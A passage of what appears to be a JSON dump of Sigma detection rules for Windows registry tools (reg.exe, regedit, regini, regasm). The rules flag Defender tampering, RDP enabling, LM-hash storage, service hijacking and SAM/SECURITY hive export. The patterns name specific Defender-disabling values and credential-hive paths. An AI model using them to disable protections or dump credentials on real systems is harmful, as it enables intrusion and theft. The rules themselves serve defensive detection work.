    "content": "title: Enable LM Hash Storage - ProcCreation\nid: 98dedfdd-8333-49d4-9f23-d7018cccae53\nrelated:\n    - id: c420410f-c2d8-4010-856b-dffe21866437 # Registry\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\n    By setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password\n    - https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-12-15\nmodified: 2023-12-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\System\\CurrentControlSet\\Control\\Lsa'\n            - 'NoLMHash'\n            - ' 0'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_query_registry.yml",
    "content": "title: Potential Configuration And Service Reconnaissance Via Reg.EXE\nid: 970007b7-ce32-49d0-a4a4-fbef016950bd\nstatus: test\ndescription: Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-02-05\ntags:\n    - attack.discovery\n    - attack.t1012\n    - attack.t1007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_flag:\n        CommandLine|contains: 'query'\n    selection_key:\n        CommandLine|contains:\n            - 'currentVersion\\windows'\n            - 'winlogon\\'\n            - 'currentVersion\\shellServiceObjectDelayLoad'\n            - 'currentVersion\\run' # Also covers the strings \"RunOnce\", \"RunOnceEx\" and \"runServicesOnce\"\n            - 'currentVersion\\policies\\explorer\\run'\n            - 'currentcontrolset\\services'\n    condition: all of selection_*\nfalsepositives:\n    - Discord\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml",
    "content": "title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE\nid: 0d5675be-bc88-4172-86d3-1e96a4476536\nstatus: test\ndescription: Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values\nreferences:\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\n    - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contains descriptions for most of the keys mentioned here (check it out if you want more information)\n    - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RDP technique\n    - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contains descriptions for most of the keys mentioned here (check it out if you want more information)\n    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\n    - https://blog.sekoia.io/darkgate-internals/\n    - https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\n    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry\n    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry\n    - https://github.com/redcanaryco/atomic-red-team/blob/dd526047b8c399c312fee47d1e6fb531164da54d/atomics/T1112/T1112.yaml#L790\n    - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer\n    - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html\n    - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RDP technique\n    - https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the \"ServiceDll\" key\n    - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html\nauthor: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport\ndate: 2022-02-12\nmodified: 2025-11-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1021.001\n    - attack.t1112\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_main_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_main_cli:\n        CommandLine|contains|all:\n            - ' add '\n            - '\\CurrentControlSet\\Control\\Terminal Server'\n            - 'REG_DWORD'\n            - ' /f'\n    selection_values_1:\n        CommandLine|contains|all:\n            - 'Licensing Core'\n            - 'EnableConcurrentSessions'\n    selection_values_2:\n        CommandLine|contains:\n            - 'AllowTSConnections'\n            - 'fDenyTSConnections'\n            - 'fEnableWinStation'\n            - 'fSingleSessionPerUser'\n            - 'IdleWinStationPoolCount'\n            - 'MaxInstanceCount'\n            - 'SecurityLayer'\n            - 'TSAdvertise'\n            - 'TSAppCompat'\n            - 'TSEnabled'\n            - 'TSUserEnabled'\n            - 'WinStations\\RDP-Tcp'\n    filter_main_values_tls:\n        CommandLine|contains|all:\n            - 'SecurityLayer'\n            - '02'  # TLS Enabled\n    condition: all of selection_main_* and 1 of selection_values_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_screensaver.yml",
    "content": "title: Suspicious ScreenSave Change by Reg.exe\nid: 0fc35fc3-efe6-4898-8a37-0b233339524f\nstatus: test\ndescription: |\n    Adversaries may establish persistence by executing malicious content triggered by user inactivity.\n    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md\n    - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf\nauthor: frack113\ndate: 2021-08-19\nmodified: 2022-06-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains:\n            - 'HKEY_CURRENT_USER\\Control Panel\\Desktop'\n            - 'HKCU\\Control Panel\\Desktop'\n    selection_option_1: # /force Active ScreenSaveActive\n        CommandLine|contains|all:\n            - '/v ScreenSaveActive'\n            - '/t REG_SZ'\n            - '/d 1'\n            - '/f'\n    selection_option_2: # /force  set ScreenSaveTimeout\n        CommandLine|contains|all:\n            - '/v ScreenSaveTimeout'\n            - '/t REG_SZ'\n            - '/d '\n            - '/f'\n    selection_option_3: # /force set ScreenSaverIsSecure\n        CommandLine|contains|all:\n            - '/v ScreenSaverIsSecure'\n            - '/t REG_SZ'\n            - '/d 0'\n            - '/f'\n    selection_option_4: # /force set a .scr\n        CommandLine|contains|all:\n            - '/v SCRNSAVE.EXE'\n            - '/t REG_SZ'\n            - '/d '\n            - '.scr'\n            - '/f'\n    condition: selection_reg and 1 of selection_option_*\nfalsepositives:\n    - GPO\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml",
    "content": "title: Changing Existing Service ImagePath Value Via Reg.EXE\nid: 9b0b7ac3-6223-47aa-a3fd-e8f211e637db\nstatus: test\ndescription: |\n    Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\n    Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\n    Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe\nauthor: frack113\ndate: 2021-12-30\nmodified: 2024-03-13\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains|all:\n            - 'add '\n            - 'SYSTEM\\CurrentControlSet\\Services\\'\n            - ' ImagePath '\n    selection_value:\n        CommandLine|contains|windash: ' -d '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml",
    "content": "title: Detected Windows Software Discovery\nid: e13f668e-7f95-443d-98d2-1816a7648a7b\nrelated:\n    - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282\n      type: derived\nstatus: test\ndescription: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md\n    - https://github.com/harleyQu1nn/AggressorScripts # AVQuery.cna\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-16\nmodified: 2022-10-09\ntags:\n    - attack.discovery\n    - attack.t1518\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'    # Example: reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion\n        CommandLine|contains|all:\n            - 'query'\n            - '\\software\\'\n            - '/v'\n            - 'svcversion'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml",
    "content": "title: Reg Add Suspicious Paths\nid: b7e2a8d4-74bb-4b78-adc9-3f92af2d4829\nstatus: test\ndescription: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2022-10-10\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_path:\n        CommandLine|contains:\n            # Add more suspicious registry locations below\n            - '\\AppDataLow\\Software\\Microsoft\\'\n            - '\\Policies\\Microsoft\\Windows\\OOBE'\n            - '\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon'\n            - '\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'\n            - '\\Microsoft\\Windows Defender\\'\n    condition: all of selection_*\nfalsepositives:\n    - Rare legitimate add to registry via cli (to these locations)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_system_language_discovery.yml",
    "content": "title: System Language Discovery via Reg.Exe\nid: c43a5405-e8e1-4221-9ac9-dbe3fa14e886\nstatus: experimental\ndescription: |\n    Detects the usage of Reg.Exe to query system language settings.\n    Attackers may discover the system language to determine the geographic location of victims, customize payloads for specific regions,\n    or avoid targeting certain locales to evade detection.\nreferences:\n    - https://scythe.io/threat-thursday/threatthursday-darkside-ransomware\nauthor: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)\ndate: 2026-01-09\ntags:\n    - attack.discovery\n    - attack.t1614.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'query'\n            - 'Control\\Nls\\Language'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Discover System Language by Registry Query\n      technique: T1614.001\n      atomic_guid: 631d4cf1-42c9-4209-8fe9-6bd4de9421be\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_volsnap_disable.yml",
    "content": "title: Disabled Volume Snapshots\nid: dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a\nstatus: test\ndescription: Detects commands that temporarily turn off Volume Snapshots\nreferences:\n    - https://twitter.com/0gtweet/status/1354766164166115331\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-28\nmodified: 2023-12-15\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\Services\\VSS\\Diag'\n            - '/d Disabled'\n    condition: selection\nfalsepositives:\n    - Legitimate administration\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml",
    "content": "title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE\nid: 452bce90-6fb0-43cc-97a5-affc283139b3\nstatus: test\ndescription: |\n    Detects the usage of \"reg.exe\" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection\nreferences:\n    - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\n    - https://github.com/swagkarna/Defeat-Defender-V1.2.0/tree/ae4059c4276da6f6303b8f53cdff085ecae88a91\n    - https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2\n    - https://tria.ge/241231-j9yatstqbm/behavioral1\nauthor: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-03-22\nmodified: 2025-06-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_root_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_root_path:\n        CommandLine|contains:\n            - 'SOFTWARE\\Microsoft\\Windows Defender\\'\n            - 'SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center'\n            - 'SOFTWARE\\Policies\\Microsoft\\Windows Defender\\'\n    selection_dword_0:\n        CommandLine|contains|all:\n            - ' add '\n            - 'd 0'\n        CommandLine|contains:\n            - 'DisallowExploitProtectionOverride'\n            - 'EnableControlledFolderAccess'\n            - 'MpEnablePus'\n            - 'PUAProtection'\n            - 'SpynetReporting'\n            - 'SubmitSamplesConsent'\n            - 'TamperProtection'\n    selection_dword_1:\n        CommandLine|contains|all:\n            - ' add '\n            - 'd 1'\n        CommandLine|contains:\n            - 'DisableAccess'\n            - 'DisableAntiSpyware'\n            - 'DisableAntiSpywareRealtimeProtection'\n            - 'DisableAntiVirus'\n            - 'DisableAntiVirusSignatures'\n            - 'DisableArchiveScanning'\n            - 'DisableBehaviorMonitoring'\n            - 'DisableBlockAtFirstSeen'\n            - 'DisableCloudProtection'\n            - 'DisableConfig'\n            - 'DisableEnhancedNotifications'\n            - 'DisableIntrusionPreventionSystem'\n            - 'DisableIOAVProtection'\n            - 'DisableNetworkProtection'\n            - 'DisableOnAccessProtection'\n            - 'DisablePrivacyMode'\n            - 'DisableRealtimeMonitoring'\n            - 'DisableRoutinelyTakingAction'\n            - 'DisableScanOnRealtimeEnable'\n            - 'DisableScriptScanning'\n            - 'DisableSecurityCenter'\n            - 'Notification_Suppress'\n            - 'SignatureDisableUpdateOnStartupWithoutEngine'\n    condition: all of selection_root_* and 1 of selection_dword_*\nfalsepositives:\n    - Rare legitimate use by administrators to test software (should always be investigated)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml",
    "content": "title: Write Protect For Storage Disabled\nid: 75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13\nstatus: test\ndescription: |\n    Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.\n    This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.\nreferences:\n    - https://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html\nauthor: Sreeman\ndate: 2021-06-11\nmodified: 2024-01-18\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\System\\CurrentControlSet\\Control'\n            - 'Write Protection'\n            - '0'\n            - 'storage'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regasm_no_flag_or_dll_execution.yml",
    "content": "title: RegAsm.EXE Execution Without CommandLine Flags or Files\nid: 651f87f7-12db-47f9-84c5-f27b081b94b6\nstatus: experimental\ndescription: |\n    Detects the execution of \"RegAsm.exe\" without a commandline flag or file, which might indicate potential process injection activity.\n    Usually \"RegAsm.exe\" should point to a dedicated DLL file or call the help with the \"/?\" flag.\nreferences:\n    - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/\n    - https://www.zscaler.fr/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla\n    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool\n    - https://app.any.run/tasks/ea944b89-69d8-49c8-ac1f-5c76ad300db2\n    - https://www.joesandbox.com/analysis/1467354/0/html\nauthor: frack113\ndate: 2025-06-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218.009\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\RegAsm.exe'\n        - OriginalFileName: 'RegAsm.exe'\n    selection_cli:\n        CommandLine|endswith:\n            - 'RegAsm'\n            - 'RegAsm.exe'\n            - 'RegAsm.exe\"'\n            - \"RegAsm.exe'\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of Regasm by developers.\n# Note: You can increase after an initial baseline\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml",
    "content": "title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension\nid: e9f8f8cc-07cc-4e81-b724-f387db9175e4\nrelated:\n    - id: cc368ed0-2411-45dc-a222-510ace303cb2\n      type: derived\nstatus: test\ndescription: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.\nreferences:\n    - https://www.fortiguard.com/threat-signal-report/4718?s=09\n    - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\n    - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\Regsvcs.exe'\n              - '\\Regasm.exe'\n        - OriginalFileName:\n              - 'RegSvcs.exe'\n              - 'RegAsm.exe'\n    selection_extension:\n        CommandLine|contains:\n            # Note: Add more potentially uncommon extensions\n            - '.dat'\n            - '.gif'\n            - '.jpeg'\n            - '.jpg'\n            - '.png'\n            - '.txt'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml",
    "content": "title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location\nid: cc368ed0-2411-45dc-a222-510ace303cb2\nrelated:\n    - id: e9f8f8cc-07cc-4e81-b724-f387db9175e4\n      type: derived\nstatus: test\ndescription: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location\nreferences:\n    - https://www.fortiguard.com/threat-signal-report/4718?s=09\n    - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\n    - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-25\nmodified: 2023-02-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\Regsvcs.exe'\n              - '\\Regasm.exe'\n        - OriginalFileName:\n              - 'RegSvcs.exe'\n              - 'RegAsm.exe'\n    selection_dir:\n        CommandLine|contains:\n            # Note: Add more potentially suspicious directories\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n            - '\\PerfLogs\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            # - '\\Desktop\\'\n            # - '\\Downloads\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml",
    "content": "title: Exports Critical Registry Keys To a File\nid: 82880171-b475-4201-b811-e9c826cd5eaa\nrelated:\n    - id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a\n      type: similar\nstatus: test\ndescription: Detects the export of a crital Registry key to a file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regedit/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Oddvar Moe, Sander Wiebing, oscd.community\ndate: 2020-10-12\nmodified: 2024-03-13\ntags:\n    - attack.exfiltration\n    - attack.discovery\n    - attack.t1012\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regedit.exe'\n        - OriginalFileName: 'REGEDIT.EXE'\n    selection_cli_1:\n        CommandLine|contains|windash: ' -E '\n    selection_cli_2:\n        CommandLine|contains:\n            - 'hklm'\n            - 'hkey_local_machine'\n    selection_cli_3:\n        CommandLine|endswith:\n            - '\\system'\n            - '\\sam'\n            - '\\security'\n    condition: all of selection_*\nfalsepositives:\n    - Dumping hives for legitimate purpouse i.e. backup or forensic investigation\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml",
    "content": "title: Exports Registry Key To a File\nid: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a\nrelated:\n    - id: 82880171-b475-4201-b811-e9c826cd5eaa\n      type: similar\nstatus: test\ndescription: Detects the export of the target Registry key to a file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regedit/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Oddvar Moe, Sander Wiebing, oscd.community\ndate: 2020-10-07\nmodified: 2024-03-13\ntags:\n    - attack.exfiltration\n    - attack.discovery\n    - attack.t1012\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regedit.exe'\n        - OriginalFileName: 'REGEDIT.EXE'\n    selection_cli:\n        CommandLine|contains|windash: ' -E '\n    filter_1:   # filters to avoid intersection with critical keys rule\n        CommandLine|contains:\n            - 'hklm'\n            - 'hkey_local_machine'\n    filter_2:\n        CommandLine|endswith:\n            - '\\system'\n            - '\\sam'\n            - '\\security'\n    condition: all of selection_* and not all of filter_*\nfalsepositives:\n    - Legitimate export of keys\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml",
    "content": "title: Imports Registry Key From a File\nid: 73bba97f-a82d-42ce-b315-9182e76c57b1\nrelated:\n    - id: 0b80ade5-6997-4b1d-99a1-71701778ea61\n      type: similar\nstatus: test\ndescription: Detects the import of the specified file to the registry with regedit.exe.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regedit/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Oddvar Moe, Sander Wiebing, oscd.community\ndate: 2020-10-07\nmodified: 2024-03-13\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regedit.exe'\n        - OriginalFileName: 'REGEDIT.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - ' /i '\n            - ' /s '\n            - '.reg'\n    filter_1:\n        CommandLine|contains|windash:\n            - ' -e '\n            - ' -a '\n            - ' -c '\n    filter_2:\n        CommandLine|re: ':[^ \\\\]'     # to avoid intersection with ADS rule\n    condition: all of selection_* and not all of filter_*\nfalsepositives:\n    - Legitimate import of keys\n    - Evernote\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml",
    "content": "title: Imports Registry Key From an ADS\nid: 0b80ade5-6997-4b1d-99a1-71701778ea61\nrelated:\n    - id: 73bba97f-a82d-42ce-b315-9182e76c57b1\n      type: similar\nstatus: test\ndescription: Detects the import of a alternate datastream to the registry with regedit.exe.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regedit/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Oddvar Moe, Sander Wiebing, oscd.community\ndate: 2020-10-12\nmodified: 2024-03-13\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regedit.exe'\n        - OriginalFileName: 'REGEDIT.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - ' /i '\n            - '.reg'\n        CommandLine|re: ':[^ \\\\]'\n    filter:\n        CommandLine|contains|windash:\n            - ' -e '\n            - ' -a '\n            - ' -c '\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regedit_trustedinstaller.yml",
    "content": "title: Regedit as Trusted Installer\nid: 883835a7-df45-43e4-bf1d-4268768afda4\nstatus: test\ndescription: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe\nreferences:\n    - https://twitter.com/1kwpeter/status/1397816101455765504\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-27\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\regedit.exe'\n        ParentImage|endswith:\n            - '\\TrustedInstaller.exe'\n            - '\\ProcessHacker.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regini_ads.yml",
    "content": "title: Suspicious Registry Modification From ADS Via Regini.EXE\nid: 77946e79-97f1-45a2-84b4-f37b5c0d8682\nrelated:\n    - id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134\n      type: derived\nstatus: test\ndescription: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regini/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini\nauthor: Eli Salem, Sander Wiebing, oscd.community\ndate: 2020-10-12\nmodified: 2023-02-08\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regini.exe'\n        - OriginalFileName: 'REGINI.EXE'\n    selection_re:\n        CommandLine|re: ':[^ \\\\]'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regini_execution.yml",
    "content": "title: Registry Modification Via Regini.EXE\nid: 5f60740a-f57b-4e76-82a1-15b6ff2cb134\nrelated:\n    - id: 77946e79-97f1-45a2-84b4-f37b5c0d8682\n      type: derived\nstatus: test\ndescription: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regini/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini\nauthor: Eli Salem, Sander Wiebing, oscd.community\ndate: 2020-10-08\nmodified: 2023-02-08\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\regini.exe'\n        - OriginalFileName: 'REGINI.EXE'\n    filter:\n        CommandLine|re: ':[^ \\\\]' # Covered in 77946e79-97f1-45a2-84b4-f37b5c0d8682\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate modification of 